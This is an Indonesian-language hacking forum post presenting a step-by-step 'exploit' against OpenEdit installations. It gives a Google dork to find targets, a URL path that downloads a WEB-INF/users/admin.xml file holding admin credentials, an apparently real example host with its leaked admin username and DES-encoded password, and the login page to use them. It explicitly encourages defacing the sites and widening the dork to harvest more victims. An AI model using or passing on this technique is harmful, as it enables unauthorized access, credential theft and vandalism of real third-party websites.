saya mau share Exploit Openedit
[#] Dorknya :
inurl:openedit/authentication/
[#] Exploitnya :
/openedit/files/download/WEB-INF/users/admin.xml
langsung saja gak usah banyak bacot lagi ..
kita langsung masuk step by step cara defacenya ..
kalo berhasil deface , Ya Selamat , hahhahaha :D
========
[#] Step 1
========
- Kita Menuju Google Lalu masukan dork diatas , oh iya silakan explore sendiri dorknya biar lebih mantap
========
[#] Step 2
========
- Pilih salah satu target digoogle tadi
Example : http://mcdev.openedit.com/
========
[#] Step 3
========
- Masukan Exploitnya Tadi
jadinya kek gini ni :
http://mcdev.openedit.com/openedit/files/download/WEB-INF/users/admin.xml
========
[#] Step 4
========
- nah , kamu akan otomatis mengunduh sebuah file XML
setelah diunduh buka File XML yang unduh kamu tadi
========
[#] Step 5
========
- Didalam File XML tu ada Password Dan Username Admin sono .
Ni contohnya aneh dapet dari target atas tadi
-
admin
DES:en9gFy2YMf0=
1145462580187
-
========
[#] Step 5
========
- Nah Tu Udah keliatan Pass adminnya
Langsung Aja Deh Login Kesini
http://mcdev.openedit.com/openedit/authentication/logon.html
========
[#] Step 6
========
- Done , Mision Selesai
Silakan Oprek Oprek sesuka Hati tu Web , kalo aku si langsung tak pepes aja , xixixi
Semoga bermanfaat ya teman , selamat berkarya
oh iya , hampir lupa ..
banyak yg bertanya tentang passnya ..
passnya adalah yg ane cetak tebal tuh bro ..DES:en9gFy2YMf0=
passnya gak perlu di apaapakan lagi , langsung saja masukan seperti itu
semoga sukses yaaa ..
NB : Dorknya Kurang Ampuh tu , silakan di kembangkan Lagi Biar Menghasilkan banyak target :)
